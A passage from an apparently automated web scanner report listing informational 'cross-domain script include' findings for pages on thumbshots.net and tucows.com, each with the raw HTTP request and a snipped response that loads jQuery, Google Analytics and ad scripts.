Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 21:25:08 GMT
Connection: close
Content-Length: 26222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</p>
<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script>
...[SNIP]...

19.366. http://www.thumbshots.net/webguide.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thumbshots.net
Path:   /webguide.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /webguide.aspx HTTP/1.1
Host: www.thumbshots.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: .THUMBSHOTSNETASPXANONYMOUS=zMJPp3r6ywEkAAAAMTM0NTk1ODEtODQ3NS00NGIwLTk0ODMtNjQ2MjU4NWVjNGNh0; expires=Thu, 14-Apr-2011 08:05:01 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: .THUMBSHOTSNETASPXANONYMOUS=zMJPp3r6ywEkAAAAMTM0NTk1ODEtODQ3NS00NGIwLTk0ODMtNjQ2MjU4NWVjNGNh0; expires=Thu, 14-Apr-2011 08:05:01 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 21:25:04 GMT
Connection: close
Content-Length: 36603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</p>
<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.367. http://www.tucows.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.368. http://www.tucows.com/about.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.369. http://www.tucows.com/advertise.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /advertise.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.370. http://www.tucows.com/affiliate/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /affiliate/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.371. http://www.tucows.com/author_ratings.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /author_ratings.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 34091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.372. http://www.tucows.com/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us</title>
<
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.373. http://www.tucows.com/images/newassets/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.374. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.375. http://www.tucows.com/images/newassets/includes/js/aalib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.376. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.377. http://www.tucows.com/images/newassets/includes/js/show_layer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.378. http://www.tucows.com/images/newassets/includes/js/signupin.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.379. http://www.tucows.com/images/newassets/includes/js/x_core.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
